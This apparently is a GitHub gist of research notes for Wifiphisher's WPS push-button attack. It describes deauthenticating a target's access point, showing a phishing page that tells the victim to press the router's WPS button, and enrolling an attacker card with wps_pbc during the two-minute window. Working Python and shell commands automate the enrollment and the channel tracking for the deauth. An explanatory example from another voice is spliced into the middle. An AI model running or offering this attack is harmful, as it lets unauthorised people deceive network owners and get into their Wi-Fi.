
@Splinter0
Last active March 19, 2017 13:36
WPS push button research for Wifiphisher

Scheme for the WPS push button attack

Using 2 wireless cards (one hosts the rogue AP, the other is shared between
deauthentication and the WPS client)

-1 Set everything up as usual.
-2 The victim sees a template with a "continue" button; pressing it sends a
    POST request that starts the whole process. We use this trigger because,
    with only 2 wireless cards, we have no other way to know when the second
    card must stop deauthenticating and start the WPS enrollment.
-3 In a thread we have a listener waiting for that POST request, which
    starts everything.

The process

-4 The message asking the victim to push the WPS button appears on the
    victim's screen while we stop the deauth and start wpa_cli on the same
    wireless card.
-5 We wait 2 minutes (the WPS specification's PBC "walk time": the AP
    accepts push-button enrollees for 120 seconds after its button is
    pressed), trying to connect to the AP while we keep scanning to check
    that the AP is still on the same channel.
-6 If we are not connected by then, the interface goes back to
    deauthenticating the target; otherwise we are done.

Problems

What if the victim resets the router instead of pressing the WPS button?

- It doesn't really matter: after those two minutes the interface goes back
    to deauth, but before that it scans for our target (by BSSID) and
    updates the deauth with the new channel (after the victim restarts the
    router the channel may change) to make sure the deauth restarts properly.
- Then it restarts everything: wait for the user to press continue, stop the
    deauth, check for 2 minutes whether it's connected, and so on.

Why do we need the "continue" button?

- Since we only have 2 wireless interfaces we need to know when to switch
    from deauth to listening for the WPS connection and back.
    (Everything will be clearer when the HTML is done.)
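The polling loop of steps 5 and 6, together with the channel re-check from the Problems section, written out as an added example; this is not code from the gist or from Wifiphisher. It assumes `wps_pbc <bssid>` has already been issued on the client interface and uses only the `wpa_cli` commands `status`, `scan` and `scan_results`. It goes slightly beyond the notes in two ways: it reads the `[WPS-PBC]` flag that wpa_supplicant prints in `scan_results` for an AP with an open push-button session (so you can tell the button was pressed before the association completes), and it skips scanning while wpa_supplicant is in the middle of joining. The names `wpa_cli_runner`, `find_target`, `wait_for_pbc`, `BUSY_STATES` and `WPS_WALK_TIME` are mine, and the sample scan output is constructed.

```python
import subprocess
import time

# Assumed constant: the WPS specification's PBC "walk time" (how long an AP
# accepts push-button enrollees after its button is pressed) is 120 seconds.
WPS_WALK_TIME = 120

# wpa_state values in which wpa_supplicant is busy joining the AP; asking it
# to scan at that point only slows the WPS handshake down.
BUSY_STATES = {"ASSOCIATING", "ASSOCIATED", "4WAY_HANDSHAKE", "GROUP_HANDSHAKE"}

# Constructed sample of `wpa_cli scan_results` output (tab separated, header
# first). [WPS-PBC] is what wpa_supplicant prints for an AP whose push button
# was pressed and whose PBC session is still open.
SAMPLE_SCAN_RESULTS = (
    "bssid / frequency / signal level / flags / ssid\n"
    "28:c6:8e:7d:51:d3\t2437\t-44\t[WPA2-PSK-CCMP][WPS-PBC][ESS]\tHomeNet\n"
    "aa:bb:cc:dd:ee:ff\t5180\t-70\t[WPA2-PSK-CCMP][ESS]\tOther\n"
)


def wpa_cli_runner(iface):
    """Return a function running `wpa_cli -i <iface> <cmd...>` that gives back stdout.
    Only this function touches the system; the rest takes `run` as a parameter."""
    def run(*args):
        proc = subprocess.run(["sudo", "wpa_cli", "-i", iface, *args],
                              stdout=subprocess.PIPE, stderr=subprocess.DEVNULL)
        return proc.stdout.decode("utf-8", "replace")
    return run


def freq_to_channel(freq_mhz):
    """Map an 802.11 centre frequency in MHz to its channel number."""
    if freq_mhz == 2484:
        return 14
    if 2412 <= freq_mhz <= 2472:
        return (freq_mhz - 2407) // 5
    if 5000 <= freq_mhz <= 5885:
        return (freq_mhz - 5000) // 5
    raise ValueError("unsupported frequency: %d MHz" % freq_mhz)


def parse_status(text):
    """Parse the key=value lines printed by `wpa_cli status` into a dict."""
    status = {}
    for line in text.splitlines():
        key, sep, value = line.partition("=")
        if sep:
            status[key.strip()] = value.strip()
    return status


def find_target(scan_results, bssid):
    """Locate the target BSSID in `wpa_cli scan_results` output.
    Returns (channel, pbc_active), or None if the AP was not seen."""
    for line in scan_results.splitlines()[1:]:  # skip the header line
        fields = line.split("\t")
        if len(fields) < 4 or fields[0].lower() != bssid.lower():
            continue
        return freq_to_channel(int(fields[1])), "[WPS-PBC]" in fields[3]
    return None


def wait_for_pbc(run, bssid, timeout=WPS_WALK_TIME, poll=5,
                 clock=time.monotonic, sleep=time.sleep):
    """Steps 5 and 6: after `wps_pbc <bssid>` was issued, poll for up to the
    walk time. Returns (connected, last_channel); last_channel is where the
    target was last seen, so the deauth can be restarted on the right channel
    even if the victim rebooted the router instead of pressing the button."""
    deadline = clock() + timeout
    last_channel = None
    while True:
        status = parse_status(run("status"))
        if (status.get("wpa_state") == "COMPLETED"
                and status.get("bssid", "").lower() == bssid.lower()):
            return True, last_channel
        if status.get("wpa_state") not in BUSY_STATES:
            # `scan` is asynchronous: `scan_results` returns the previous
            # scan's table, which is fine because we poll repeatedly.
            run("scan")
            seen = find_target(run("scan_results"), bssid)
            if seen is not None:
                last_channel = seen[0]
        if clock() >= deadline:
            return False, last_channel
        sleep(poll)


if __name__ == "__main__":
    # Offline demonstration on the constructed sample. On a real system use
    # run = wpa_cli_runner("wlan1") after `wpa_cli -i wlan1 wps_pbc <bssid>`.
    print(find_target(SAMPLE_SCAN_RESULTS, "28:c6:8e:7d:51:d3"))  # (6, True)
```

The `run`, `clock` and `sleep` parameters exist so the loop can be driven with canned `wpa_cli` output and a fake clock; the caller that owns the deauth thread uses the returned channel to re-target the deauth when `connected` comes back False.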
"""
Automatic WPS connection with push button
Passing arguments: bssid and iface
"""
import subprocess


class WPS(object):
    def __init__(self, bssid, iface, driver="nl80211"):
        self.bssid = bssid
        self.iface = iface
        # The original used -Dwext; that backend is deprecated and nl80211 is
        # what current Linux wireless drivers expose
        self.driver = driver
        self.conf_dir = "/etc/wpa_supplicant.conf"

    def setup(self):
        """Write the wpa_supplicant config, start wpa_supplicant and issue wps_pbc"""
        conf = ("ctrl_interface=/var/run/wpa_supplicant\n"
                "ctrl_interface_group=0\n"
                "update_config=1\n")
        # "sudo echo ... > file" runs the redirect as the unprivileged user,
        # so write the file through tee under sudo instead
        subprocess.run(["sudo", "tee", self.conf_dir], input=conf.encode(),
                       stdout=subprocess.DEVNULL, check=True)
        # Start wpa_supplicant in the background on the attack interface
        subprocess.check_call(["sudo", "wpa_supplicant", "-B", "-D" + self.driver,
                               "-i" + self.iface, "-c" + self.conf_dir])
        # Sometimes the iface goes down after wpa_supplicant starts
        subprocess.check_call(["sudo", "ifconfig", self.iface, "up"])
        # Start push-button enrollment against the target BSSID only. wps_pbc
        # returns "OK" immediately; the enrollment itself runs inside
        # wpa_supplicant, so no backgrounded wpa_cli (-B) is needed
        subprocess.check_call(["sudo", "wpa_cli", "-i", self.iface,
                               "wps_pbc", self.bssid])

    def dest(self):
        """Disconnect from the AP and clean up"""
        subprocess.call(["sudo", "rm", "-f", self.conf_dir])
        subprocess.call(["sudo", "ifconfig", self.iface, "down"])
        subprocess.call(["sudo", "ifconfig", self.iface, "up"])
        subprocess.call(["sudo", "killall", "wpa_supplicant"])


if __name__ == "__main__":
    wp = WPS("28:c6:8e:7d:51:d3", "wlan1")
    wp.dest()

How the push button actually works:

Push-button configuration (PBC): in some Wi-Fi Protected Setup networks, the user may connect multiple devices to the network and enable data encryption by pushing a button. The access point/wireless router will have a physical button, and other devices may have a physical or software-based button. Users should be aware that during the two-minute setup period which follows the push of the button, unintended devices could join the network if they are in range.

(source: the Wikipedia article "Wi-Fi Protected Setup")

Single commands:

printf 'ctrl_interface=/var/run/wpa_supplicant\nctrl_interface_group=0\nupdate_config=1\n' | sudo tee /etc/wpa_supplicant.conf   # "sudo echo ... > file" would run the redirect as the unprivileged user
sudo wpa_supplicant -B -Dnl80211 -iwlan1 -c/etc/wpa_supplicant.conf   # -Dwext (used originally) is deprecated; nl80211 is the current backend
sudo ifconfig wlan1 up   # not necessary (sometimes the iface goes down when activating wpa_supplicant)
sudo wpa_cli -i wlan1 wps_pbc 28:c6:8e:7d:51:d3    # your AP's BSSID; wps_pbc returns "OK" at once and the 120 s enrollment runs inside wpa_supplicant, so -B (daemonize wpa_cli) is not needed

Automated version:

The script above automates the connection through wps_pbc.
